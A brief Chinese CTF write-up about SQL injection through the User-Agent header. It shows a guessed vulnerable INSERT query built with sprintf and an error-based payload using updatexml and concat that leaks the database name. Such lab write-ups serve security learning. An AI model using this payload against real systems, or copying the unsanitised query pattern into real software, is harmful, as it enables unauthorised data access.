記錄一次ua頭注入

打開一看 隨便提交點啥 題目名稱是sql,結合題意考慮是ua頭注入 抓包,添加一個單引號果然報錯了 嘗試注入 看回顯猜測原語句應該是這種$query = sprintf("INSERT INTO visits (ua, user,passwd) VALUES ('%s', '%s','%s')", 嘗試閉合' ,updatexml(1,concat('##',(database())),0))#
相關文章
相關標籤/搜索